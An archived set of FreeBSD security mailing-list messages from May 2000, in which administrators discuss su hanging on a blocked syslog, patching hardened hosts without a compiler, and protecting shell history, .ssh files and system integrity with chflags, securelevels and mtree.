mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 9:39:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 5767E37B574 for ; Thu, 11 May 2000 09:39:09 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id MAA17559; Thu, 11 May 2000 12:39:04 -0400 (EDT) (envelope-from wollman) Date: Thu, 11 May 2000 12:39:04 -0400 (EDT) From: Garrett Wollman Message-Id: <200005111639.MAA17559@khavrinen.lcs.mit.edu> To: Paul Hart Cc: Garrett Wollman , freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output In-Reply-To: References: <200005111611.MAA17380@khavrinen.lcs.mit.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > That's a scary thought. "Our security depends on all attackers being > stupid." No, not at all. Just because a security mechanism can be bypassed by an expert does not imply that it is totally useless. Security is still improved overall by being able to catch stupid attackers! > Shouldn't we work toward meaningful tools that cannot be > subverted even by the most skilled of attackers? That is certainly a worthwhile goal. However, there is a valid engineering trade-off between the value of a system and the cost of implementing more advanced security services. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 9:59:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from newmail.sentex.ca (newmail.sentex.ca [207.245.238.163]) by hub.freebsd.org (Postfix) with ESMTP id 67A9537BA40; Thu, 11 May 2000 09:59:21 -0700 (PDT) (envelope-from mike@sentex.ca) Received: from granite.sentex.net (granite-atm.sentex.ca [209.112.4.1]) by newmail.sentex.ca (8.9.3/8.9.3) with ESMTP id LAA23556; Thu, 11 May 2000 11:57:16 GMT (envelope-from mike@sentex.ca) Received: from simoeon (simeon.sentex.ca [209.112.4.47]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id MAA27834; Thu, 11 May 2000 12:59:19 -0400 (EDT) Message-Id: <3.0.5.32.20000511125540.019f1ea0@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32) Date: Thu, 11 May 2000 12:55:40 -0400 To: questions@FreeBSD.ORG From: Mike Tancsa Subject: Re: Cant su Cc: security@FreeBSD.ORG In-Reply-To: References: <4.2.2.20000510202431.03935c20@mail.sentex.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 09:30 PM 5/10/00 -0600, Ryan Thompson wrote: >Mike Tancsa wrote to questions@FreeBSD.ORG: > >> >> I have a test box that is having problems with su. If I do something like >> su username >> >> and give it the wrong password, it just hangs >> >> buildbox% su mdtancsa >> Password: >> Sorry >> >> >> And it just hangs after the sorry. Any ideas what might be going on ? >> >> 3.4-STABLE FreeBSD 3.4-STABLE #0: Mon Mar 6 20:10:37 EST 2000 >> >> ---Mike > >I don't see this behaviour on either of my 3.4 machines (one machine was >updated last week. The other is running from a 2 m.o. cvsup), using >descrypt on one. > >Define "hangs"... I.e., if this is on a local vty, can you switch to >another? I assume ^C/^Z don't knock it out? Does it hang the whole box >(can you ping/login to the machine?). Or is su the only process that's >hanging? Can you do a ps -axl? Is the box using remote passwords? > >Have you changed your crypt libs around lately? Are all the links as they >should be? Modtimes sufficiently old? > >Occasionally, on virtual terminals, when a program exits on failure >(usually after it dumps core), I don't get a prompt back, and the term >wreaks havoc with the keyboard. Usually I just kill the controlling shell >and getty cleans up the mess :-) Its something around this perhaps. UID PID PPID CPU PRI NI VSZ RSS WCHAN STAT TT TIME COMMAND 1001 65053 65051 0 18 0 1372 1012 pause Is p4 0:00.07 -tcsh (tcsh) 0 65062 65053 255 4 -2 1020 648 ttywri I<+ p4 0:00.01 su ps -auxt v0 USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND root 337 0.0 0.0 0 0 v0- Z - 0:00.00 (login) When I physically went to the machine this morning, V0 was indeed hosed and in a zombie state. Is this co-incidence ? Is there anyway to simulate this issue so that I can see if the behaviour is repeatable ? Would it be because syslog is trying to write to the console and the process is getting stuck there ? Hmmm Ah ha! I just went to the machine and killed syslogd, and the problem is fixed! I guess su was writing to syslogd a "BAD su to root" message, but syslogd could not write to /dev/console because the console getty was hosed on ttyV0 and su just wait there indefinitly. I havent thought about it enough, but is there a potential for a little denial of service ? At the very least, should su get stuck waiting for syslog to do its thing like this ? I would say not, as I was locked out of my box temporarily until I was able to physically get to it this morning and login directly as root. ---Mike ------------------------------------------------------------------------ Mike Tancsa, tel +1 519 651 3400 Sentex Communications mike@sentex.net Cambridge, Ontario Canada www.sentex.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 10:56:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from smtp9.xs4all.nl (smtp9.xs4all.nl [194.109.127.52]) by hub.freebsd.org (Postfix) with ESMTP id 5F6B837BBBD for ; Thu, 11 May 2000 10:56:01 -0700 (PDT) (envelope-from frohwein@xs4all.nl) Received: from NT2 (dc2-isdn1669.dial.xs4all.nl [194.109.154.133]) by smtp9.xs4all.nl (8.9.3/8.9.3) with SMTP id TAA10593 for ; Thu, 11 May 2000 19:55:59 +0200 (CEST) From: "robf" To: Subject: Date: Thu, 11 May 2000 20:03:40 +0200 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org auth 7e9e6a57 subscribe freebsd-security frohwein@xs4all.nl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 12: 3:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from ctg-nt.ctg.albany.edu (ctg-nt.ctg.albany.edu [169.226.80.32]) by hub.freebsd.org (Postfix) with ESMTP id 0B00137BA1F for ; Thu, 11 May 2000 12:03:22 -0700 (PDT) (envelope-from dwerthmu@ctg.albany.edu) Received: by ctg-nt.ctg.albany.edu with Internet Mail Service (5.5.2650.21) id ; Thu, 11 May 2000 15:04:49 -0400 Message-ID: <7A71D0D43B9ED1119EC10008C756C3042F76FB@ctg-nt.ctg.albany.edu> From: Derek Werthmuller To: freebsd-security@FreeBSD.ORG Subject: Applying patches with out a compiler Date: Thu, 11 May 2000 15:04:41 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm interested in applying standard "Release" versions of FreeBSD with out using a compiler in the system. I generaly don't advise leaving a working compiler in say a firewall or a hardened system. I know that I can have a seperate system that I can use to connect via CVS and use that to update the hardened systems. But doesn't that just keep my sources up to date and I still need to build/build world every so often? Is there another way to apply the security related patches ? Thanks Derek Werthmuller Center for Technology in Government To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 12:13: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from smail1.register.com (smail1.register.com [209.67.50.101]) by hub.freebsd.org (Postfix) with ESMTP id E29D537BB78 for ; Thu, 11 May 2000 12:12:59 -0700 (PDT) (envelope-from nkulynych@register.com) Received: from ix.register.com ([209.208.136.136]) by smail1.register.com (Post.Office MTA v3.5.3 release 223 ID# 0-61300U9000L3150S0V35) with SMTP id com for ; Thu, 11 May 2000 14:39:42 -0400 From: Nazar Kulynych Organization: Register.Com Inc. To: security@FreeBSD.ORG Subject: high load Date: Thu, 11 May 2000 13:39:29 -0400 X-Mailer: KMail [version 1.0.20] Content-Type: text/plain MIME-Version: 1.0 Message-Id: <00051113444502.00773@ix.register.com> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org when I do rm or tar -zxf the load gets upto 5.00 on a pentium 200mmx with 48MB ram. I can't figure out what's going on Thanx in advance To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 12:13:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from turing.csis.gvsu.edu (turing.csis.gvsu.edu [148.61.162.181]) by hub.freebsd.org (Postfix) with SMTP id 99EE637B809 for ; Thu, 11 May 2000 12:13:31 -0700 (PDT) (envelope-from matt@csis.gvsu.edu) Received: (qmail 30111 invoked by uid 0); 11 May 2000 19:13:30 -0000 Received: from pm490-34.dialip.mich.net (HELO contempt.badmofo.net) (198.110.188.92) by csis.gvsu.edu with SMTP; 11 May 2000 19:13:30 -0000 Received: (qmail 6863 invoked by uid 500); 11 May 2000 19:15:44 -0000 From: matt@csis.gvsu.edu Date: Thu, 11 May 2000 15:15:44 -0400 To: Derek Werthmuller Cc: freebsd-security@FreeBSD.ORG Subject: Re: Applying patches with out a compiler Message-ID: <20000511151544.A6826@contempt.badmofo.net> References: <7A71D0D43B9ED1119EC10008C756C3042F76FB@ctg-nt.ctg.albany.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <7A71D0D43B9ED1119EC10008C756C3042F76FB@ctg-nt.ctg.albany.edu>; from dwerthmu@ctg.albany.edu on Thu, May 11, 2000 at 03:04:41PM -0400 X-my-OS-is-better-than-your-OS: FreeBSD 4.0-STABLE i386 X-suspicion-breeds: confidence Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It took Derek Werthmuller 17 lines to say: > I'm interested in applying standard "Release" versions of FreeBSD with out > using a compiler in the system. I generaly don't advise leaving a working > compiler in say a firewall or a hardened system. I know that I can have a > seperate system that I can use to connect via CVS and use that to update the > hardened systems. But doesn't that just keep my sources up to date and I > still need to build/build world every so often? Is there another way to > apply the security related patches ? How about 'chmod 500 /usr/bin/{cc,ld}' and do your 'make world's as root? If an attacker has root, using the compiler is the least of your worrys. -- matt@csis.gvsu.edu http://www.csis.gvsu.edu/matt 03 F8 23 C5 43 A2 F7 5A 24 49 F7 B0 3A F9 B1 7F Trying is the first step towards failure - Homer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 13:18:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8CD7137B556; Thu, 11 May 2000 13:18:43 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA41678; Thu, 11 May 2000 13:18:42 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 11 May 2000 13:18:42 -0700 (PDT) From: Kris Kennaway To: Derek Werthmuller Cc: freebsd-security@FreeBSD.ORG Subject: Re: Applying patches with out a compiler In-Reply-To: <7A71D0D43B9ED1119EC10008C756C3042F76FB@ctg-nt.ctg.albany.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 11 May 2000, Derek Werthmuller wrote: > I'm interested in applying standard "Release" versions of FreeBSD with > out using a compiler in the system. I generaly don't advise leaving a > working compiler in say a firewall or a hardened system. I know that > I can have a seperate system that I can use to connect via CVS and use > that to update the hardened systems. But doesn't that just keep my > sources up to date and I still need to build/build world every so > often? Is there another way to apply the security related patches ? Compile on another machine, copy it over. For example, if you want to update the entire machine to -stable, you can do a buildworld on one machine, NFS mount the /usr/src and /usr/obj on the target, and do make installworld there. Kris ---- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 13:44:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from grimreaper.grondar.za (grimreaper.grondar.za [196.7.18.138]) by hub.freebsd.org (Postfix) with ESMTP id D851D37BA23 for ; Thu, 11 May 2000 13:44:31 -0700 (PDT) (envelope-from mark@grondar.za) Received: from grimreaper.grondar.za (localhost [127.0.0.1]) by grimreaper.grondar.za (8.9.3/8.9.3) with ESMTP id WAA41333; Thu, 11 May 2000 22:44:22 +0200 (SAST) (envelope-from mark@grimreaper.grondar.za) Message-Id: <200005112044.WAA41333@grimreaper.grondar.za> To: Paul Hart Cc: freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output References: In-Reply-To: ; from Paul Hart "Thu, 11 May 2000 10:21:22 CST." Date: Thu, 11 May 2000 22:44:22 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [ Change the freaking subject already!! ] > That's a scary thought. "Our security depends on all attackers being > stupid." Shouldn't we work toward meaningful tools that cannot be > subverted even by the most skilled of attackers? Not all attackers are > script kiddies and it would be foolish of us to think they are. *Bing* for (;;) printf("There is no silver bullet!\n"); The only workable tool is a well-paid, paranoid security guy. The rest are there to help the WPPSG. M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 14:15:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from overcee.netplex.com.au (peter1.yahoo.com [208.48.107.4]) by hub.freebsd.org (Postfix) with ESMTP id 3143B37BC3A for ; Thu, 11 May 2000 14:15:34 -0700 (PDT) (envelope-from peter@netplex.com.au) Received: from netplex.com.au (localhost [127.0.0.1]) by overcee.netplex.com.au (Postfix) with ESMTP id 0C8361CD7; Thu, 11 May 2000 14:15:33 -0700 (PDT) (envelope-from peter@netplex.com.au) X-Mailer: exmh version 2.1.1 10/15/1999 To: Alfred Perlstein Cc: Garrett Wollman , Paul Hart , freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output In-Reply-To: Message from Alfred Perlstein of "Thu, 11 May 2000 09:55:13 PDT." <20000511095512.D4889@fw.wintelcom.net> Date: Thu, 11 May 2000 14:15:33 -0700 From: Peter Wemm Message-Id: <20000511211533.0C8361CD7@overcee.netplex.com.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Alfred Perlstein wrote: > * Garrett Wollman [000511 09:46] wrote: > > < sa id: > > > > > If I can root your box, what's to stop me from falsifying the > > > reference data in /var used by /etc/security to detect system > > > changes? > > > > Stupidity and inexperience. > > That and chflags. :) > > > Also, not all break-ins result in root compromise. > > Most I've seen lately result in pretty hysterical /root/.bash_history > files. :) Something along the lines of 'chflags uappnd,uunlnk .bash_history' (or system if it's root) can cause hours of fun and joy reading the history after the event.. Sheer panic sets in pretty quickly, and then they start looking to see what incriminating evidence they've left behind... It has in the past turned out to be an invaluable source of clues and hints as to what the state of the art is with the script kiddies. Usually you can tip off a few dozen other exploited sites as well. ``script kiddies'' usually leave a trail lit up with lights and it can be quite entertaining to see what they've tried out of ignorance. A professional is another thing though. Cheers, -Peter -- Peter Wemm - peter@FreeBSD.org; peter@yahoo-inc.com; peter@netplex.com.au "All of this is for nothing if we don't go to the stars" - JMS/B5 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 18:17: 0 2000 Delivered-To: freebsd-security@freebsd.org Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (Postfix) with ESMTP id 26ECD37BC6F for ; Thu, 11 May 2000 18:16:57 -0700 (PDT) (envelope-from jeff-ml@mountin.net) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id UAA18678; Thu, 11 May 2000 20:16:54 -0500 (CDT) (envelope-from jeff-ml@mountin.net) Received: from dial-85.max1.wa.cyberlynk.net(207.227.118.85) by peak.mountin.net via smap (V1.3) id sma018676; Thu May 11 20:16:39 2000 Message-Id: <4.3.2.20000511192741.00c24ac0@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Version 4.3 Date: Thu, 11 May 2000 20:10:41 -0500 To: Mike Silbersack From: "Jeffrey J. Mountin" Subject: Re: envy.vuurwerk.nl daily run output Cc: security@FreeBSD.ORG In-Reply-To: References: <20000509150609.L42267@vuurwerk.nl> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 01:56 PM 5/10/00 -0500, Mike Silbersack wrote: >This just got me thinking... are .ssh/authorized_keys files checked for >changes by the security scripts? I know I probably wouldn't notice for a >long while if someone had modified mine, all the time during which someone >could be playing around on the box. You could always force the ownership of .ssh/ and any files under it to root. This adds some administrative overhead, but then to change authorized_keys they already have root and you have a bigger fish to fry. The only that needed to change for openssh is the file permissions. With ssh from ports the .ssh directory and files could be owned by root with the same group as the user: .ssh/ root: mode 510 .ssh/authorized_keys root: mode 440 With openssh in the bases system the modes must be 511 and 444 in order for RSA authentication to work in contradiction with the suggestions in sshd(8). In any case you can make it more difficult. Combining chflags and the secure level would make it even harder, but then you have an administrative nightmare to modify existing files. Jeff Mountin - jeff@mountin.net Systems/Network Administrator FreeBSD - the power to serve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 19:21:24 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail3.gmx.net (mail.gmx.net [194.221.183.63]) by hub.freebsd.org (Postfix) with SMTP id 974CA37B94D for ; Thu, 11 May 2000 19:21:21 -0700 (PDT) (envelope-from Gerhard.Sittig@gmx.net) Received: (qmail 10370 invoked by uid 0); 12 May 2000 02:21:18 -0000 Received: from p3e9e7a25.dip.t-dialin.net (HELO speedy.gsinet) (62.158.122.37) by mail.gmx.net with SMTP; 12 May 2000 02:21:18 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id VAA02561 for freebsd-security@FreeBSD.ORG; Thu, 11 May 2000 21:42:59 +0200 Date: Thu, 11 May 2000 21:42:59 +0200 From: Gerhard Sittig To: freebsd-security@FreeBSD.ORG Subject: Re: Applying patches with out a compiler Message-ID: <20000511214259.A1453@speedy.gsinet> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <7A71D0D43B9ED1119EC10008C756C3042F76FB@ctg-nt.ctg.albany.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <7A71D0D43B9ED1119EC10008C756C3042F76FB@ctg-nt.ctg.albany.edu>; from dwerthmu@ctg.albany.edu on Thu, May 11, 2000 at 03:04:41PM -0400 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, May 11, 2000 at 15:04 -0400, Derek Werthmuller wrote: > I'm interested in applying standard "Release" versions of > FreeBSD with out using a compiler in the system. You might want to read the "Server Farm" thread on -stable running since two(?) days, talking about "make installworld" based on "make buildword" output generated somewhere else. At least it did in the beginning. :) But this solution assumes you're not scared of running the machine as a network filesystem client (no matter if NFS or something different). But this is only needed at upgrade time. virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 19:33: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id E271837B7AB for ; Thu, 11 May 2000 19:33:05 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id TAA21901; Thu, 11 May 2000 19:32:23 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda21899; Thu May 11 19:32:13 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id TAA54444; Thu, 11 May 2000 19:32:12 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdg54442; Thu May 11 19:31:26 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.1/8.9.1) id e4C2VPD35790; Thu, 11 May 2000 19:31:25 -0700 (PDT) Message-Id: <200005120231.e4C2VPD35790@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdC35785; Thu May 11 19:30:34 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.0-STABLE X-Sender: cy To: Mark Murray Cc: Paul Hart , freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output In-reply-to: Your message of "Thu, 11 May 2000 22:44:22 +0200." <200005112044.WAA41333@grimreaper.grondar.za> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 11 May 2000 19:30:34 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <200005112044.WAA41333@grimreaper.grondar.za>, Mark Murray writes: > [ Change the freaking subject already!! ] > > > That's a scary thought. "Our security depends on all attackers being > > stupid." Shouldn't we work toward meaningful tools that cannot be > > subverted even by the most skilled of attackers? Not all attackers are > > script kiddies and it would be foolish of us to think they are. > > *Bing* > > for (;;) > printf("There is no silver bullet!\n"); > > The only workable tool is a well-paid, paranoid security guy. The rest > are there to help the WPPSG. I think that having tripwire or something with the same functionality and features should be included in the base system. Talking to a salesman at Tripwire, they have plans to release the Tripwire 2.x source. Once they do I'll attempt a port. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 19:48:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from mtiwmhc23.worldnet.att.net (mtiwmhc23.worldnet.att.net [204.127.131.48]) by hub.freebsd.org (Postfix) with ESMTP id 21A6037B789 for ; Thu, 11 May 2000 19:48:46 -0700 (PDT) (envelope-from shalunov@att.net) Received: from sharik.worldnet.att.net ([12.68.38.143]) by mtiwmhc23.worldnet.att.net (InterMail vM.4.01.02.39 201-229-119-122) with ESMTP id <20000512024844.NDDA3646.mtiwmhc23.worldnet.att.net@sharik.worldnet.att.net>; Fri, 12 May 2000 02:48:44 +0000 Received: (from shalunov@localhost) by sharik.worldnet.att.net (8.9.2/8.9.2) id WAA00497; Thu, 11 May 2000 22:48:42 -0400 (EDT) (envelope-from shalunov) To: "Jeffrey J. Mountin" Cc: freebsd-security@freebsd.org Subject: Re: envy.vuurwerk.nl daily run output References: <20000509150609.L42267@vuurwerk.nl> <4.3.2.20000511192741.00c24ac0@207.227.119.2> From: stanislav shalunov Date: 11 May 2000 22:48:41 -0400 In-Reply-To: "Jeffrey J. Mountin"'s message of "Thu, 11 May 2000 20:10:41 -0500" Message-ID: <87snvo8ovq.fsf@sharik.worldnet.att.net> Lines: 15 X-Mailer: Gnus v5.5/Emacs 20.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Jeffrey J. Mountin" writes: > You could always force the ownership of .ssh/ and any files under it > to root. But the owner of the home directory can just "mv .ssh ssh-forget-me". If the user already has an authorized_keys file, he'd probably notice. Otherwise, especially if he doesn't ssh out from that machine or it has a good known_hosts file it can go unnoticed. Or did you mean "...and check that ownership didn't change daily"? (They could move the directories around daily, too.) -- stanislav shalunov | Speaking only for myself. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 20: 7: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id EFB4037B943 for ; Thu, 11 May 2000 20:07:04 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id XAA22136; Thu, 11 May 2000 23:06:57 -0400 (EDT) (envelope-from wollman) Date: Thu, 11 May 2000 23:06:57 -0400 (EDT) From: Garrett Wollman Message-Id: <200005120306.XAA22136@khavrinen.lcs.mit.edu> To: Cy Schubert - ITSD Open Systems Group Cc: Mark Murray , Paul Hart , freebsd-security@FreeBSD.ORG Subject: Re: envy.vuurwerk.nl daily run output In-Reply-To: <200005120231.e4C2VPD35790@cwsys.cwsent.com> References: <200005112044.WAA41333@grimreaper.grondar.za> <200005120231.e4C2VPD35790@cwsys.cwsent.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > I think that having tripwire or something with the same functionality > and features should be included in the base system. We do. It would take a bit of work to create an `exclude' file (see my recent commit) so that constantly-changing files would not raise alarms, but otherwise `mtree -K md5digest,sha1digest,ripemd160digest' should do the trick. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 11 21: 6:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 52D6037BCC8 for ; Thu, 11 May 2000 21:06:22 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id VAA22420; Thu, 11 May 2000 21:05:45 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda22418; Thu May 11 21:05:36 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id VAA55812; Thu, 11 May 2000 21:05:36 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdi55801; Thu May 11 21:05:28 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.1/8.9.1) id e4C45S938145; Thu, 11 May 2000 21:05:28 -0700 (PDT) Message-Id: <200005120405.e4C45S938145@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdH38132; Thu May 11 21:04:46 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.0-STABLE X-Sender: cy To: matt@csis.gvsu.edu Cc: Derek Werthmuller , freebsd-security@FreeBSD.ORG Subject: Re: Applying patches with out a compiler In-reply-to: Your message of "Thu, 11 May 2000 15:15:44 EDT." <20000511151544.A6826@contempt.badmofo.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 11 May 2000 21:04:46 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20000511151544.A6826@contempt.badmofo.net>, matt@csis.gvsu.edu writ es: > It took Derek Werthmuller 17 lines to say: > > I'm interested in applying standard "Release" versions of FreeBSD with out > > using a compiler in the system. I generaly don't advise leaving a working > > compiler in say a firewall or a hardened system. I know that I can have a > > seperate system that I can use to connect via CVS and use that to update th > e > > hardened systems. But doesn't that just keep my sources up to date and I > > still need to build/build world every so often? Is there another way to > > apply the security related patches ? > > How about 'chmod 500 /usr/bin/{cc,ld}' and do your 'make world's as root? > If an attacker has root, using the compiler is the least of your worrys. All an attacker would need to do is ftp a C compiler from another system or better yet ftp the binaries required to compromise your system from another system. A better approach would be to make key (or all system) files immutable and your logs append only and run your system at securelevel 2 or 3. This wouldn't necessarily stop anyone from breaking root but it would limit the damage. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA 